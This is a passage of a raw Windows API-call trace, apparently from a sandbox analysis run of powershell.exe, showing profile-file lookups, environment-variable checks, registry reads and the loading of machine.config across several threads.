	[0105.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xeda40 | out: lpFileInformation=0xeda40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0105.809] SetErrorMode (uMode=0x1) returned 0x1
	[0105.809] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0105.809] SetErrorMode (uMode=0x1) returned 0x1
	[0105.810] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xeda40 | out: lpFileInformation=0xeda40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0105.810] SetErrorMode (uMode=0x1) returned 0x1
	[0105.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0105.810] SetErrorMode (uMode=0x1) returned 0x1
	[0105.810] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xeda40 | out: lpFileInformation=0xeda40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0105.810] SetErrorMode (uMode=0x1) returned 0x1
	[0105.811] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.811] CoTaskMemFree (pv=0x28e5c0) 
	[0105.812] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.812] CoTaskMemFree (pv=0x28e5c0) 
	[0105.812] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.812] CoTaskMemFree (pv=0x28e5c0) 
	[0105.813] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.813] CoTaskMemFree (pv=0x28e5c0) 
	[0105.818] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.818] CoTaskMemFree (pv=0x28e5c0) 
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x394
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a0
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x308
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0105.819] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0105.820] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.821] CoTaskMemFree (pv=0x28e5c0) 
	[0105.823] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0105.823] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xedc20 | out: lpMode=0xedc20) returned 1
	[0105.824] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.824] CoTaskMemFree (pv=0x28e5c0) 
	[0105.826] SetEvent (hEvent=0x378) returned 1
	[0105.827] SetEvent (hEvent=0x390) returned 1
	[0105.827] SetEvent (hEvent=0x394) returned 1
	[0105.827] SetEvent (hEvent=0x3b4) returned 1
	[0105.827] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0105.829] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.829] CoTaskMemFree (pv=0x28e5c0) 
	[0105.830] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xed978 | out: phkResult=0xed978*=0x33c) returned 0x0
	[0105.830] RegQueryValueExW (in: hKey=0x33c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xed8fc, lpData=0x0, lpcbData=0xed8f8*=0x0 | out: lpType=0xed8fc*=0x0, lpData=0x0, lpcbData=0xed8f8*=0x0) returned 0x2

Thread:
	id = 97
	os_tid = 0xbf4


Thread:
	id = 98
	os_tid = 0xbec


Thread:
	id = 100
	os_tid = 0x5a8


Thread:
	id = 103
	os_tid = 0x8d8


Thread:
	id = 104
	os_tid = 0x8c8

	[0091.508] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0099.514] LocalFree (hMem=0x1e7170) returned 0x0
	[0099.514] CloseHandle (hObject=0x320) returned 1
	[0099.514] CloseHandle (hObject=0x13) returned 1
	[0099.515] CloseHandle (hObject=0xf) returned 1
	[0099.515] RegCloseKey (hKey=0x30c) returned 0x0
	[0099.515] RegCloseKey (hKey=0x308) returned 0x0
	[0099.515] RegCloseKey (hKey=0x304) returned 0x0
	[0099.516] LocalFree (hMem=0x1e7140) returned 0x0
	[0099.516] RegCloseKey (hKey=0x330) returned 0x0
	[0100.928] RegCloseKey (hKey=0x334) returned 0x0
	[0103.424] RegCloseKey (hKey=0x388) returned 0x0
	[0103.424] RegCloseKey (hKey=0x384) returned 0x0
	[0103.424] RegCloseKey (hKey=0x380) returned 0x0
	[0103.425] RegCloseKey (hKey=0x37c) returned 0x0
	[0103.425] RegCloseKey (hKey=0x354) returned 0x0
	[0103.425] RegCloseKey (hKey=0x3b0) returned 0x0
	[0103.425] RegCloseKey (hKey=0x3ac) returned 0x0
	[0103.425] RegCloseKey (hKey=0x374) returned 0x0
	[0103.426] RegCloseKey (hKey=0x370) returned 0x0
	[0103.426] RegCloseKey (hKey=0x36c) returned 0x0
	[0103.426] RegCloseKey (hKey=0x368) returned 0x0
	[0103.426] RegCloseKey (hKey=0x364) returned 0x0
	[0103.427] RegCloseKey (hKey=0x360) returned 0x0
	[0103.427] RegCloseKey (hKey=0x35c) returned 0x0
	[0103.427] RegCloseKey (hKey=0x358) returned 0x0
	[0103.427] RegCloseKey (hKey=0x3a8) returned 0x0
	[0103.428] RegCloseKey (hKey=0x348) returned 0x0
	[0103.428] RegCloseKey (hKey=0x344) returned 0x0
	[0103.428] RegCloseKey (hKey=0x340) returned 0x0
	[0103.428] RegCloseKey (hKey=0x33c) returned 0x0
	[0103.429] RegCloseKey (hKey=0x338) returned 0x0
	[0103.429] RegCloseKey (hKey=0x320) returned 0x0
	[0103.429] RegCloseKey (hKey=0x30c) returned 0x0
	[0103.429] RegCloseKey (hKey=0x308) returned 0x0
	[0103.430] RegCloseKey (hKey=0x3a4) returned 0x0
	[0103.430] RegCloseKey (hKey=0x330) returned 0x0
	[0103.430] RegCloseKey (hKey=0x334) returned 0x0
	[0103.430] RegCloseKey (hKey=0x3a0) returned 0x0
	[0103.431] RegCloseKey (hKey=0x39c) returned 0x0
	[0103.431] RegCloseKey (hKey=0x378) returned 0x0
	[0103.431] RegCloseKey (hKey=0x3b4) returned 0x0
	[0103.431] RegCloseKey (hKey=0x394) returned 0x0
	[0103.432] RegCloseKey (hKey=0x390) returned 0x0
	[0103.432] RegCloseKey (hKey=0x38c) returned 0x0
	[0109.525] RegCloseKey (hKey=0x33c) returned 0x0

Thread:
	id = 121
	os_tid = 0x248

	[0105.880] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0105.885] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0105.890] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.890] CoTaskMemFree (pv=0x28e5c0) 
	[0105.892] VirtualQuery (in: lpAddress=0x1c60dc20, lpBuffer=0x1c60eae0, dwLength=0x30 | out: lpBuffer=0x1c60eae0*(BaseAddress=0x1c60d000, AllocationBase=0x1bc80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.911] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.912] CoTaskMemFree (pv=0x28e5c0) 
	[0105.915] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.915] CoTaskMemFree (pv=0x28e5c0) 
	[0105.918] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.918] CoTaskMemFree (pv=0x28e5c0) 
	[0105.935] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.935] CoTaskMemFree (pv=0x28e5c0) 
	[0105.937] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.937] CoTaskMemFree (pv=0x28e5c0) 
	[0105.939] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.939] CoTaskMemFree (pv=0x28e5c0) 
	[0105.992] VirtualQuery (in: lpAddress=0x1c60ded0, lpBuffer=0x1c60ed90, dwLength=0x30 | out: lpBuffer=0x1c60ed90*(BaseAddress=0x1c60d000, AllocationBase=0x1bc80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.993] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.993] CoTaskMemFree (pv=0x28e5c0) 
	[0105.996] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.996] CoTaskMemFree (pv=0x28e5c0) 
	[0105.996] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.996] CoTaskMemFree (pv=0x28e5c0) 
	[0105.997] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.997] CoTaskMemFree (pv=0x28e5c0) 
	[0106.002] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.002] CoTaskMemFree (pv=0x28e5c0) 
	[0106.128] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.128] CoTaskMemFree (pv=0x28e5c0) 
	[0106.131] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.131] CoTaskMemFree (pv=0x28e5c0) 
	[0106.133] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.133] CoTaskMemFree (pv=0x28e5c0) 
	[0106.136] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.136] CoTaskMemFree (pv=0x28e5c0) 
	[0106.138] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.138] CoTaskMemFree (pv=0x28e5c0) 
	[0106.140] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.140] CoTaskMemFree (pv=0x28e5c0) 
	[0106.142] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.143] CoTaskMemFree (pv=0x28e5c0) 
	[0106.214] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.214] CoTaskMemFree (pv=0x28e5c0) 
	[0106.344] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.344] CoTaskMemFree (pv=0x28e5c0) 
	[0106.413] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.413] CoTaskMemFree (pv=0x28e5c0) 
	[0106.417] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.417] CoTaskMemFree (pv=0x28e5c0) 
	[0106.421] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0106.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.421] CoTaskMemFree (pv=0x28e5c0) 
	[0115.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c60d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0115.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c60d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0115.917] CoTaskMemAlloc (cb=0x20c) returned 0x1b312180
	[0115.918] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b312180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0115.918] CoTaskMemFree (pv=0x1b312180) 
	[0115.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c60d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0116.119] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.119] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d868 | out: TokenHandle=0x1c60d868*=0x33c) returned 1
	[0116.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c60d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0116.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c60d910 | out: lpFileInformation=0x1c60d910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0116.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c60d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0116.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c60d8c0 | out: lpFileInformation=0x1c60d8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0116.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c60d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0116.145] SetErrorMode (uMode=0x1) returned 0x1
	[0116.145] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x360
	[0116.145] GetFileType (hFile=0x360) returned 0x1
	[0116.145] SetErrorMode (uMode=0x1) returned 0x1
	[0116.145] GetFileType (hFile=0x360) returned 0x1
	[0116.148] GetFileSize (in: hFile=0x360, lpFileSizeHigh=0x1c60d8b8 | out: lpFileSizeHigh=0x1c60d8b8*=0x0) returned 0x622a
	[0116.148] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d7d8, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d7d8*=0x1000, lpOverlapped=0x0) returned 1
	[0116.550] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d308, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d308*=0x1000, lpOverlapped=0x0) returned 1
	[0116.551] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d308, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d308*=0x1000, lpOverlapped=0x0) returned 1
	[0116.551] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d308, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d308*=0x1000, lpOverlapped=0x0) returned 1
	[0116.551] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d308, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d308*=0x1000, lpOverlapped=0x0) returned 1
	[0116.554] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d448, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d448*=0x1000, lpOverlapped=0x0) returned 1
	[0116.555] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d2c8*=0x22a, lpOverlapped=0x0) returned 1
	[0116.555] ReadFile (in: hFile=0x360, lpBuffer=0x2ea7758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c60d368, lpOverlapped=0x0 | out: lpBuffer=0x2ea7758*, lpNumberOfBytesRead=0x1c60d368*=0x0, lpOverlapped=0x0) returned 1
	[0116.555] CloseHandle (hObject=0x360) returned 1
	[0116.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c60d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0116.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c60d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0116.556] CoTaskMemAlloc (cb=0x20c) returned 0x1b312180
	[0116.556] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b312180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0116.556] CoTaskMemFree (pv=0x1b312180) 
	[0116.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c60d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0116.557] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.557] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60dac8 | out: TokenHandle=0x1c60dac8*=0x360) returned 1
	[0116.558] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.558] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60dac8 | out: TokenHandle=0x1c60dac8*=0x35c) returned 1
	[0116.559] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.559] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d868 | out: TokenHandle=0x1c60d868*=0x364) returned 1
	[0116.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c60d910 | out: lpFileInformation=0x1c60d910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0116.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c60d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
